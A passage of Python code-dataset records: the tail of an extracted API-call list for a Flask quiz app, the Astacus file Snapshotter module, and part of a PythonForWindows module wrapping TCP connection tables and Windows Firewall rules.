request, abort\n'), ((1431, 1458), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (1447, 1458), False, 'from flask import request, abort\n'), ((1472, 1630), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT a.id FROM answer a INNER JOIN question q WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s"""', '[room_id, user_id]'], {}), "(\n 'SELECT a.id FROM answer a INNER JOIN question q WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s'\n , [room_id, user_id])\n", (1485, 1630), True, 'import datab.social_database as db\n'), ((1821, 1846), 'flask.request.args.get', 'request.args.get', (['"""email"""'], {}), "('email')\n", (1837, 1846), False, 'from flask import request, abort\n'), ((1861, 1892), 'datab.social_database.register_or_get_email', 'db.register_or_get_email', (['email'], {}), '(email)\n', (1885, 1892), True, 'import datab.social_database as db\n'), ((1904, 1931), 'json.dumps', 'json.dumps', (["{'id': id_user}"], {}), "({'id': id_user})\n", (1914, 1931), False, 'import json\n'), ((1994, 2021), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (2010, 2021), False, 'from flask import request, abort\n'), ((2036, 2102), 'datab.social_database.exec_query', 'db.exec_query', (['"""INSERT INTO room (creator) VALUES (%s)"""', '[user_id]'], {}), "('INSERT INTO room (creator) VALUES (%s)', [user_id])\n", (2049, 2102), True, 'import datab.social_database as db\n'), ((2114, 2141), 'json.dumps', 'json.dumps', (["{'id': room_id}"], {}), "({'id': room_id})\n", (2124, 2141), False, 'import json\n'), ((2200, 2227), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (2216, 2227), False, 'from flask import request, abort\n'), ((2241, 2326), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT r.id, r.status FROM room r WHERE r.creator=%s"""', '[user_id]'], {}), "('SELECT r.id, r.status FROM room r WHERE r.creator=%s', [user_id]\n )\n", (2254, 2326), True, 'import datab.social_database as db\n'), ((2432, 2452), 'json.dumps', 'json.dumps', (['response'], {}), '(response)\n', (2442, 2452), False, 'import json\n'), ((2531, 2549), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2547, 2549), False, 'from flask import request, abort\n'), ((2961, 2988), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (2977, 2988), False, 'from flask import request, abort\n'), ((3012, 3097), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE room r SET r.status=\'started\' WHERE r.id = %s"""', '[room_id]'], {}), '("UPDATE room r SET r.status=\'started\' WHERE r.id = %s", [room_id]\n )\n', (3025, 3097), True, 'import datab.social_database as db\n'), ((3104, 3190), 'json.dumps', 'json.dumps', (["{'info': 'The room has been opened successfully', 'status': 'started'}"], {}), "({'info': 'The room has been opened successfully', 'status':\n 'started'})\n", (3114, 3190), False, 'import json\n'), ((3247, 3274), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (3263, 3274), False, 'from flask import request, abort\n'), ((3279, 3364), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE room r SET r.status=\'closed\' WHERE r.id = %s"""', '[room_id]'], {}), '("UPDATE room r SET r.status=\'closed\' WHERE r.id = %s", [room_id]\n )\n', (3292, 3364), True, 'import datab.social_database as db\n'), ((3371, 3456), 'json.dumps', 'json.dumps', (["{'info': 'The room has been closed successfully', 'status': 'closed'}"], {}), "({'info': 'The room has been closed successfully', 'status':\n 'closed'})\n", (3381, 3456), False, 'import json\n'), ((3515, 3542), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (3531, 3542), False, 'from flask import request, abort\n'), ((3547, 3634), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE room r SET r.status=\'finished\' WHERE r.id = %s"""', '[room_id]'], {}), '("UPDATE room r SET r.status=\'finished\' WHERE r.id = %s", [\n room_id])\n', (3560, 3634), True, 'import datab.social_database as db\n'), ((3718, 4013), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT u.email , COUNT(qq.id) FROM quiz_question qq INNER JOIN users u ON (qq.asked_user_id = u.id) INNER JOIN room_members rm ON (u.id = rm.user_id) WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s GROUP BY u.email ORDER BY COUNT(qq.id) DESC"""', '[room_id]'], {}), "(\n 'SELECT u.email , COUNT(qq.id) FROM quiz_question qq INNER JOIN users u ON (qq.asked_user_id = u.id) INNER JOIN room_members rm ON (u.id = rm.user_id) WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s GROUP BY u.email ORDER BY COUNT(qq.id) DESC'\n , [room_id])\n", (3731, 4013), True, 'import datab.social_database as db\n'), ((4324, 4356), 'json.dumps', 'json.dumps', (["{'ranking': ranking}"], {}), "({'ranking': ranking})\n", (4334, 4356), False, 'import json\n'), ((4419, 4446), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (4435, 4446), False, 'from flask import request, abort\n'), ((4503, 4568), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT status FROM room WHERE id = %s"""', '[room_id]'], {}), "('SELECT status FROM room WHERE id = %s', [room_id])\n", (4516, 4568), True, 'import datab.social_database as db\n'), ((4580, 4616), 'json.dumps', 'json.dumps', (["{'status': values[0][0]}"], {}), "({'status': values[0][0]})\n", (4590, 4616), False, 'import json\n'), ((4706, 4733), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (4722, 4733), False, 'from flask import request, abort\n'), ((4747, 4832), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT id, question FROM question WHERE room_id = %s"""', '[room_id]'], {}), "('SELECT id, question FROM question WHERE room_id = %s', [room_id]\n )\n", (4760, 4832), True, 'import datab.social_database as db\n'), ((4938, 4973), 'json.dumps', 'json.dumps', (["{'questions': response}"], {}), "({'questions': response})\n", (4948, 4973), False, 'import json\n'), ((5068, 5086), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (5084, 5086), False, 'from flask import request, abort\n'), ((5354, 5459), 'datab.social_database.exec_many_query', 'db.exec_many_query', (['"""INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)"""', 'values'], {}), "(\n 'INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)',\n values)\n", (5372, 5459), True, 'import datab.social_database as db\n'), ((5462, 5499), 'json.dumps', 'json.dumps', (["{'info': 'Data received'}"], {}), "({'info': 'Data received'})\n", (5472, 5499), False, 'import json\n'), ((5675, 5722), 'datab.social_database.get_non_answered_questions', 'db.get_non_answered_questions', (['room_id', 'user_id'], {}), '(room_id, user_id)\n', (5704, 5722), True, 'import datab.social_database as db\n'), ((5751, 5795), 'datab.social_database.get_non_answered_people', 'db.get_non_answered_people', (['room_id', 'user_id'], {}), '(room_id, user_id)\n', (5777, 5795), True, 'import datab.social_database as db\n'), ((8731, 8767), 'flask.request.args.get', 'request.args.get', (['"""quiz_question_id"""'], {}), "('quiz_question_id')\n", (8747, 8767), False, 'from flask import request, abort\n'), ((8789, 8823), 'flask.request.args.get', 'request.args.get', (['"""quiz_answer_id"""'], {}), "('quiz_answer_id')\n", (8805, 8823), False, 'from flask import request, abort\n'), ((8829, 8942), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE quiz_question SET answered_id = %s WHERE id = %s"""', '[quiz_answer_id, quiz_question_id]'], {}), "('UPDATE quiz_question SET answered_id = %s WHERE id = %s', [\n quiz_answer_id, quiz_question_id])\n", (8842, 8942), True, 'import datab.social_database as db\n'), ((8951, 9097), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT qq.answered_id, qq.correct_answer_id, qq.question_id FROM quiz_question qq WHERE qq.id = %s"""', '[quiz_question_id]'], {}), "(\n 'SELECT qq.answered_id, qq.correct_answer_id, qq.question_id FROM quiz_question qq WHERE qq.id = %s'\n , [quiz_question_id])\n", (8964, 9097), True, 'import datab.social_database as db\n'), ((9256, 9345), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT a.answer FROM answer a WHERE a.id = %s """', '[correct_answer_id]'], {}), "('SELECT a.answer FROM answer a WHERE a.id = %s ', [\n correct_answer_id])\n", (9269, 9345), True, 'import datab.social_database as db\n'), ((9536, 9681), 'json.dumps', 'json.dumps', (["{'correct': answered_id == correct_answer_id, 'question': question_id,\n 'correct_answer': {'id': correct_answer_id, 'text': text}}"], {}), "({'correct': answered_id == correct_answer_id, 'question':\n question_id, 'correct_answer': {'id': correct_answer_id, 'text': text}})\n", (9546, 9681), False, 'import json\n'), ((9752, 9766), 'flaskrun.flaskrun.flask_run', 'flask_run', (['app'], {}), '(app)\n', (9761, 9766), False, 'from flaskrun.flaskrun import flask_run\n'), ((912, 926), 'json.dumps', 'json.dumps', (['{}'], {}), '({})\n', (922, 926), False, 'import json\n'), ((2591, 2629), 'json.dumps', 'json.dumps', (["{'error': 'no JSON found'}"], {}), "({'error': 'no JSON found'})\n", (2601, 2629), False, 'import json\n'), ((2865, 2902), 'json.dumps', 'json.dumps', (["{'info': 'Data received'}"], {}), "({'info': 'Data received'})\n", (2875, 2902), False, 'import json\n'), ((5573, 5600), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (5589, 5600), False, 'from flask import request, abort\n'), ((5620, 5647), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (5636, 5647), False, 'from flask import request, abort\n'), ((5901, 5937), 'random.sample', 'random.sample', (['possible_questions', '(1)'], {}), '(possible_questions, 1)\n', (5914, 5937), False, 'import random\n'), ((5977, 6006), 'datab.social_database.get_all_questions', 'db.get_all_questions', (['room_id'], {}), '(room_id)\n', (5997, 6006), True, 'import datab.social_database as db\n'), ((6174, 6213), 'random.sample', 'random.sample', (['possible_users_to_ask', '(1)'], {}), '(possible_users_to_ask, 1)\n', (6187, 6213), False, 'import random\n'), ((6256, 6301), 'datab.social_database.get_all_different_people', 'db.get_all_different_people', (['room_id', 'user_id'], {}), '(room_id, user_id)\n', (6283, 6301), True, 'import datab.social_database as db\n'), ((6496, 6563), 'datab.social_database.insert_quiz_question', 'db.insert_quiz_question', (['user_id', 'asked_about_id[0]', 'question_id[0]'], {}), '(user_id, asked_about_id[0], question_id[0])\n', (6519, 6563), True, 'import datab.social_database as db\n'), ((6587, 6642), 'datab.social_database.get_all_different_people', 'db.get_all_different_people', (['room_id', 'asked_about_id[0]'], {}), '(room_id, asked_about_id[0])\n', (6614, 6642), True, 'import datab.social_database as db\n'), ((6651, 6678), 'random.shuffle', 'random.shuffle', (['other_users'], {}), '(other_users)\n', (6665, 6678), False, 'import random\n'), ((6732, 6780), 'datab.social_database.get_answer', 'db.get_answer', (['question_id[0]', 'asked_about_id[0]'], {}), '(question_id[0], asked_about_id[0])\n', (6745, 6780), True, 'import datab.social_database as db\n'), ((6790, 6901), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s"""', '[answer_id, quiz_question_id]'], {}), "('UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s',\n [answer_id, quiz_question_id])\n", (6803, 6901), True, 'import datab.social_database as db\n'), ((7286, 7309), 'random.shuffle', 'random.shuffle', (['answers'], {}), '(answers)\n', (7300, 7309), False, 'import random\n'), ((7556, 7726), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT id FROM quiz_question WHERE asked_user_id = %s AND about_user_id = %s AND question_id = %s"""', '[user_id, asked_about_id[0], question_id[0]]'], {}), "(\n 'SELECT id FROM quiz_question WHERE asked_user_id = %s AND about_user_id = %s AND question_id = %s'\n , [user_id, asked_about_id[0], question_id[0]])\n", (7569, 7726), True, 'import datab.social_database as db\n'), ((7869, 7958), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT q.question FROM question q WHERE q.id = %s"""', '[question_id[0]]'], {}), "('SELECT q.question FROM question q WHERE q.id = %s', [\n question_id[0]])\n", (7882, 7958), True, 'import datab.social_database as db\n'), ((8104, 8183), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT u.email FROM users u WHERE u.id=%s"""', '[asked_about_id[0]]'], {}), "('SELECT u.email FROM users u WHERE u.id=%s', [asked_about_id[0]])\n", (8117, 8183), True, 'import datab.social_database as db\n'), ((8413, 8504), 'json.dumps', 'json.dumps', (["{'id': quiz_question_id, 'question': question_text, 'answers': answer_json}"], {}), "({'id': quiz_question_id, 'question': question_text, 'answers':\n answer_json})\n", (8423, 8504), False, 'import json\n'), ((8579, 8654), 'json.dumps', 'json.dumps', (["{'error': 'Not available questions for this user in this room'}"], {}), "({'error': 'Not available questions for this user in this room'})\n", (8589, 8654), False, 'import json\n'), ((9478, 9524), 'json.dumps', 'json.dumps', (["{'error': 'Internal server error'}"], {}), "({'error': 'Internal server error'})\n", (9488, 9524), False, 'import json\n'), ((2761, 2853), 'datab.social_database.exec_query', 'db.exec_query', (['"""INSERT INTO question (room_id, question) VALUES (%s, %s)"""', '[room_id, q]'], {}), "('INSERT INTO question (room_id, question) VALUES (%s, %s)', [\n room_id, q])\n", (2774, 2853), True, 'import datab.social_database as db\n'), ((5128, 5166), 'json.dumps', 'json.dumps', (["{'error': 'no JSON found'}"], {}), "({'error': 'no JSON found'})\n", (5138, 5166), False, 'import json\n'), ((6073, 6109), 'random.sample', 'random.sample', (['possible_questions', '(1)'], {}), '(possible_questions, 1)\n', (6086, 6109), False, 'import random\n'), ((6371, 6410), 'random.sample', 'random.sample', (['possible_users_to_ask', '(1)'], {}), '(possible_users_to_ask, 1)\n', (6384, 6410), False, 'import random\n'), ((7114, 7159), 'datab.social_database.get_answer', 'db.get_answer', (['question_id[0]', 'other_users[i]'], {}), '(question_id[0], other_users[i])\n', (7127, 7159), True, 'import datab.social_database as db\n')] |
"""
Copyright (c) 2020 Aiven Ltd
See LICENSE for details
"""
from astacus.common import magic, utils
from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState
from astacus.common.progress import increase_worth_reporting, Progress
from pathlib import Path
from typing import Optional
import base64
import hashlib
import logging
import os
import threading
logger = logging.getLogger(__name__)
_hash = hashlib.blake2s
def hash_hexdigest_readable(f, *, read_buffer=1_000_000):
h = _hash()
while True:
data = f.read(read_buffer)
if not data:
break
h.update(data)
return h.hexdigest()
class Snapshotter:
"""Snapshotter keeps track of files on disk, and their hashes.
The hash on disk MAY change, which may require subsequent
incremential snapshot and-or ignoring the files which have changed.
The output to outside is just root object's hash, as well as list
of other hashes which correspond to files referred to within the
file list contained in root object.
Note that any call to public API MUST be made with
snapshotter.lock held. This is because Snapshotter is process-wide
utility that is shared across operations, possibly used from
multiple threads, and the single-operation-only mode of operation
is not exactly flawless (the 'new operation can be started with
old running' is intentional feature but new operation should
eventually replace the old). The lock itself might not need to be
built-in to Snapshotter, but having it there enables asserting its
state during public API calls.
"""
def __init__(self, *, src, dst, globs, parallel):
assert globs # model has empty; either plugin or configuration must supply them
self.src = Path(src)
self.dst = Path(dst)
self.globs = globs
self.relative_path_to_snapshotfile = {}
self.hexdigest_to_snapshotfiles = {}
self.parallel = parallel
self.lock = threading.Lock()
def _list_files(self, basepath: Path):
result_files = set()
for glob in self.globs:
for path in basepath.glob(glob):
if not path.is_file() or path.is_symlink():
continue
relpath = path.relative_to(basepath)
for parent in relpath.parents:
if parent.name == magic.ASTACUS_TMPDIR:
break
else:
result_files.add(relpath)
return sorted(result_files)
def _list_dirs_and_files(self, basepath: Path):
files = self._list_files(basepath)
dirs = {p.parent for p in files}
return sorted(dirs), files
def _add_snapshotfile(self, snapshotfile: SnapshotFile):
old_snapshotfile = self.relative_path_to_snapshotfile.get(snapshotfile.relative_path, None)
if old_snapshotfile:
self._remove_snapshotfile(old_snapshotfile)
self.relative_path_to_snapshotfile[snapshotfile.relative_path] = snapshotfile
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles.setdefault(snapshotfile.hexdigest, []).append(snapshotfile)
def _remove_snapshotfile(self, snapshotfile: SnapshotFile):
assert self.relative_path_to_snapshotfile[snapshotfile.relative_path] == snapshotfile
del self.relative_path_to_snapshotfile[snapshotfile.relative_path]
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles[snapshotfile.hexdigest].remove(snapshotfile)
def _snapshotfile_from_path(self, relative_path):
src_path = self.src / relative_path
st = src_path.stat()
return SnapshotFile(relative_path=relative_path, mtime_ns=st.st_mtime_ns, file_size=st.st_size)
def _get_snapshot_hash_list(self, relative_paths):
same = 0
lost = 0
for relative_path in relative_paths:
old_snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
try:
snapshotfile = self._snapshotfile_from_path(relative_path)
except FileNotFoundError:
lost += 1
if increase_worth_reporting(lost):
logger.debug("#%d. lost - %s disappeared before stat, ignoring", lost, self.src / relative_path)
continue
if old_snapshotfile:
snapshotfile.hexdigest = old_snapshotfile.hexdigest
snapshotfile.content_b64 = old_snapshotfile.content_b64
if old_snapshotfile == snapshotfile:
same += 1
if increase_worth_reporting(same):
logger.debug("#%d. same - %r in %s is same", same, old_snapshotfile, relative_path)
continue
yield snapshotfile
def get_snapshot_hashes(self):
assert self.lock.locked()
return [
SnapshotHash(hexdigest=dig, size=sf[0].file_size) for dig, sf in self.hexdigest_to_snapshotfiles.items() if sf
]
def get_snapshot_state(self):
assert self.lock.locked()
return SnapshotState(root_globs=self.globs, files=sorted(self.relative_path_to_snapshotfile.values()))
def _snapshot_create_missing_directories(self, *, src_dirs, dst_dirs):
changes = 0
for i, relative_dir in enumerate(set(src_dirs).difference(dst_dirs), 1):
dst_path = self.dst / relative_dir
dst_path.mkdir(parents=True, exist_ok=True)
if increase_worth_reporting(i):
logger.debug("#%d. new directory: %r", i, relative_dir)
changes += 1
return changes
def _snapshot_remove_extra_files(self, *, src_files, dst_files):
changes = 0
for i, relative_path in enumerate(set(dst_files).difference(src_files), 1):
dst_path = self.dst / relative_path
snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
if snapshotfile:
self._remove_snapshotfile(snapshotfile)
dst_path.unlink()
if increase_worth_reporting(i):
logger.debug("#%d. extra file: %r", i, relative_path)
changes += 1
return changes
def _snapshot_add_missing_files(self, *, src_files, dst_files):
existing = 0
disappeared = 0
changes = 0
for i, relative_path in enumerate(set(src_files).difference(dst_files), 1):
src_path = self.src / relative_path
dst_path = self.dst / relative_path
try:
os.link(src=src_path, dst=dst_path, follow_symlinks=False)
except FileExistsError:
# This happens only if snapshot is started twice at
# same time. While it is technically speaking upstream
# error, we rather handle it here than leave
# exceptions not handled.
existing += 1
if increase_worth_reporting(existing):
logger.debug("#%d. %s already existed, ignoring", existing, src_path)
continue
except FileNotFoundError:
disappeared += 1
if increase_worth_reporting(disappeared):
logger.debug("#%d. %s disappeared before linking, ignoring", disappeared, src_path)
continue
if increase_worth_reporting(i - disappeared):
logger.debug("#%d. new file: %r", i - disappeared, relative_path)
changes += 1
return changes
def snapshot(self, *, progress: Optional[Progress] = None):
assert self.lock.locked()
if progress is None:
progress = Progress()
src_dirs, src_files = self._list_dirs_and_files(self.src)
progress.start(1)
if self.src == self.dst:
# The src=dst mode should be used if and only if it is
# known that files will not disappear between snapshot and
# upload steps (e.g. Astacus controls the lifecycle of the
# files within). In that case, there is little point in
# making extra symlinks and we can just use the src
# directory contents as-is.
dst_dirs, dst_files = src_dirs, src_files
else:
progress.add_total(3)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
# Create missing directories
changes = self._snapshot_create_missing_directories(src_dirs=src_dirs, dst_dirs=dst_dirs)
progress.add_success()
# Remove extra files
changes += self._snapshot_remove_extra_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# Add missing files
changes += self._snapshot_add_missing_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# We COULD also remove extra directories, but it is not
# probably really worth it and due to ignored files it
# actually might not even work.
# Then, create/update corresponding snapshotfile objects (old
# ones were already removed)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
snapshotfiles = list(self._get_snapshot_hash_list(dst_files))
progress.add_total(len(snapshotfiles))
def _cb(snapshotfile):
# src may or may not be present; dst is present as it is in snapshot
with snapshotfile.open_for_reading(self.dst) as f:
if snapshotfile.file_size <= magic.EMBEDDED_FILE_SIZE:
snapshotfile.content_b64 = base64.b64encode(f.read()).decode()
else:
snapshotfile.hexdigest = hash_hexdigest_readable(f)
return snapshotfile
def _result_cb(*, map_in, map_out):
self._add_snapshotfile(map_out)
progress.add_success()
return True
changes += len(snapshotfiles)
utils.parallel_map_to(iterable=snapshotfiles, fun=_cb, result_callback=_result_cb, n=self.parallel)
# We initially started with 1 extra
progress.add_success()
return changes
| [
"logging.getLogger",
"astacus.common.progress.increase_worth_reporting",
"os.link",
"pathlib.Path",
"threading.Lock",
"astacus.common.utils.parallel_map_to",
"astacus.common.ipc.SnapshotFile",
"astacus.common.ipc.SnapshotHash",
"astacus.common.progress.Progress"
] | [((383, 410), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (400, 410), False, 'import logging\n'), ((1794, 1803), 'pathlib.Path', 'Path', (['src'], {}), '(src)\n', (1798, 1803), False, 'from pathlib import Path\n'), ((1823, 1832), 'pathlib.Path', 'Path', (['dst'], {}), '(dst)\n', (1827, 1832), False, 'from pathlib import Path\n'), ((2006, 2022), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (2020, 2022), False, 'import threading\n'), ((3701, 3793), 'astacus.common.ipc.SnapshotFile', 'SnapshotFile', ([], {'relative_path': 'relative_path', 'mtime_ns': 'st.st_mtime_ns', 'file_size': 'st.st_size'}), '(relative_path=relative_path, mtime_ns=st.st_mtime_ns,\n file_size=st.st_size)\n', (3713, 3793), False, 'from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState\n'), ((10082, 10186), 'astacus.common.utils.parallel_map_to', 'utils.parallel_map_to', ([], {'iterable': 'snapshotfiles', 'fun': '_cb', 'result_callback': '_result_cb', 'n': 'self.parallel'}), '(iterable=snapshotfiles, fun=_cb, result_callback=\n _result_cb, n=self.parallel)\n', (10103, 10186), False, 'from astacus.common import magic, utils\n'), ((4937, 4986), 'astacus.common.ipc.SnapshotHash', 'SnapshotHash', ([], {'hexdigest': 'dig', 'size': 'sf[0].file_size'}), '(hexdigest=dig, size=sf[0].file_size)\n', (4949, 4986), False, 'from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState\n'), ((5533, 5560), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['i'], {}), '(i)\n', (5557, 5560), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((6115, 6142), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['i'], {}), '(i)\n', (6139, 6142), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((7419, 7460), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['(i - disappeared)'], {}), '(i - disappeared)\n', (7443, 7460), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((7744, 7754), 'astacus.common.progress.Progress', 'Progress', ([], {}), '()\n', (7752, 7754), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((6609, 6667), 'os.link', 'os.link', ([], {'src': 'src_path', 'dst': 'dst_path', 'follow_symlinks': '(False)'}), '(src=src_path, dst=dst_path, follow_symlinks=False)\n', (6616, 6667), False, 'import os\n'), ((4185, 4215), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['lost'], {}), '(lost)\n', (4209, 4215), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((4638, 4668), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['same'], {}), '(same)\n', (4662, 4668), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((6995, 7029), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['existing'], {}), '(existing)\n', (7019, 7029), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n'), ((7236, 7273), 'astacus.common.progress.increase_worth_reporting', 'increase_worth_reporting', (['disappeared'], {}), '(disappeared)\n', (7260, 7273), False, 'from astacus.common.progress import increase_worth_reporting, Progress\n')] |
import windows
import ctypes
import socket
import struct
from windows import winproxy
import windows.generated_def as gdef
from windows.com import interfaces as cominterfaces
from windows.generated_def.winstructs import *
from windows.generated_def.windef import *
class TCP4Connection(MIB_TCPROW_OWNER_PID):
"""A TCP4 socket (connected or listening)"""
@property
def established(self):
"""``True`` if connection is established else it's a listening socket"""
return self.dwState == MIB_TCP_STATE_ESTAB
@property
def remote_port(self):
""":type: :class:`int`"""
if not self.established:
return None
return socket.ntohs(self.dwRemotePort)
@property
def local_port(self):
""":type: :class:`int`"""
return socket.ntohs(self.dwLocalPort)
@property
def local_addr(self):
"""Local address IP (x.x.x.x)
:type: :class:`str`"""
return socket.inet_ntoa(struct.pack("<I", self.dwLocalAddr))
@property
def remote_addr(self):
"""remote address IP (x.x.x.x)
:type: :class:`str`"""
if not self.established:
return None
return socket.inet_ntoa(struct.pack("<I", self.dwRemoteAddr))
@property
def remote_proto(self):
"""Identification of the protocol associated with the remote port.
Equals ``remote_port`` if no protocol is associated with it.
:type: :class:`str` or :class:`int`
"""
try:
return socket.getservbyport(self.remote_port, 'tcp')
except socket.error:
return self.remote_port
@property
def remote_host(self):
"""Identification of the remote hostname.
Equals ``remote_addr`` if the resolution fails
:type: :class:`str` or :class:`int`
"""
try:
return socket.gethostbyaddr(self.remote_addr)
except socket.error:
return self.remote_addr
def close(self):
"""Close the connection <require elevated process>"""
closing = MIB_TCPROW()
closing.dwState = MIB_TCP_STATE_DELETE_TCB
closing.dwLocalAddr = self.dwLocalAddr
closing.dwLocalPort = self.dwLocalPort
closing.dwRemoteAddr = self.dwRemoteAddr
closing.dwRemotePort = self.dwRemotePort
return winproxy.SetTcpEntry(ctypes.byref(closing))
def __repr__(self):
if not self.established:
return "<TCP IPV4 Listening socket on {0}:{1}>".format(self.local_addr, self.local_port)
return "<TCP IPV4 Connection {s.local_addr}:{s.local_port} -> {s.remote_addr}:{s.remote_port}>".format(s=self)
class TCP6Connection(MIB_TCP6ROW_OWNER_PID):
"""A TCP6 socket (connected or listening)"""
@staticmethod
def _str_ipv6_addr(addr):
return ":".join(c.encode('hex') for c in addr)
@property
def established(self):
"""``True`` if connection is established else it's a listening socket"""
return self.dwState == MIB_TCP_STATE_ESTAB
@property
def remote_port(self):
""":type: :class:`int`"""
if not self.established:
return None
return socket.ntohs(self.dwRemotePort)
@property
def local_port(self):
""":type: :class:`int`"""
return socket.ntohs(self.dwLocalPort)
@property
def local_addr(self):
"""Local address IP
:type: :class:`str`"""
return self._str_ipv6_addr(self.ucLocalAddr)
@property
def remote_addr(self):
"""remote address IP
:type: :class:`str`"""
if not self.established:
return None
return self._str_ipv6_addr(self.ucRemoteAddr)
@property
def remote_proto(self):
"""Equals to ``self.remote_port`` for Ipv6"""
return self.remote_port
@property
def remote_host(self):
"""Equals to ``self.remote_addr`` for Ipv6"""
return self.remote_addr
def close(self):
raise NotImplementedError("Closing IPV6 connection non implemented")
def __repr__(self):
if not self.established:
return "<TCP IPV6 Listening socket on {0}:{1}>".format(self.local_addr, self.local_port)
return "<TCP IPV6 Connection {0}:{1} -> {2}:{3}>".format(self.local_addr, self.local_port, self.remote_addr, self.remote_port)
def get_MIB_TCPTABLE_OWNER_PID_from_buffer(buffer):
x = windows.generated_def.winstructs.MIB_TCPTABLE_OWNER_PID.from_buffer(buffer)
nb_entry = x.dwNumEntries
class _GENERATED_MIB_TCPTABLE_OWNER_PID(ctypes.Structure):
_fields_ = [
("dwNumEntries", DWORD),
("table", TCP4Connection * nb_entry),
]
return _GENERATED_MIB_TCPTABLE_OWNER_PID.from_buffer(buffer)
def get_MIB_TCP6TABLE_OWNER_PID_from_buffer(buffer):
x = windows.generated_def.winstructs.MIB_TCP6TABLE_OWNER_PID.from_buffer(buffer)
nb_entry = x.dwNumEntries
# Struct _MIB_TCP6TABLE_OWNER_PID definitions
class _GENERATED_MIB_TCP6TABLE_OWNER_PID(Structure):
_fields_ = [
("dwNumEntries", DWORD),
("table", TCP6Connection * nb_entry),
]
return _GENERATED_MIB_TCP6TABLE_OWNER_PID.from_buffer(buffer)
class Firewall(cominterfaces.INetFwPolicy2):
"""The windows firewall"""
@property
def rules(self):
"""The rules of the firewall
:type: [:class:`FirewallRule`] -- A list of rule
"""
ifw_rules = cominterfaces.INetFwRules()
self.get_Rules(ifw_rules)
nb_rules = gdef.LONG()
ifw_rules.get_Count(nb_rules)
unknw = cominterfaces.IUnknown()
ifw_rules.get__NewEnum(unknw)
pVariant = cominterfaces.IEnumVARIANT()
unknw.QueryInterface(pVariant.IID, pVariant)
count = gdef.ULONG()
var = windows.com.ImprovedVariant()
rules = []
for i in range(nb_rules.value):
pVariant.Next(1, var, count)
if not count.value:
break
rule = FirewallRule()
idisp = var.asdispatch
idisp.QueryInterface(rule.IID, rule)
rules.append(rule)
return rules
@property
def current_profile_types(self):
"""Mask of the profiles currently enabled
:type: :class:`long`
"""
cpt = gdef.LONG()
self.get_CurrentProfileTypes(cpt)
return cpt.value
@property
def enabled(self):
"""A maping of the active firewall profiles
{
``NET_FW_PROFILE_TYPE2_.NET_FW_PROFILE2_DOMAIN(0x1L)``: ``True`` or ``False``,
``NET_FW_PROFILE_TYPE2_.NET_FW_PROFILE2_PRIVATE(0x2L)``: ``True`` or ``False``,
``NET_FW_PROFILE_TYPE2_.NET_FW_PROFILE2_PUBLIC(0x4L)``: ``True`` or ``False``,
}
:type: :class:`dict`
"""
profiles = [gdef.NET_FW_PROFILE2_DOMAIN, gdef.NET_FW_PROFILE2_PRIVATE, gdef.NET_FW_PROFILE2_PUBLIC]
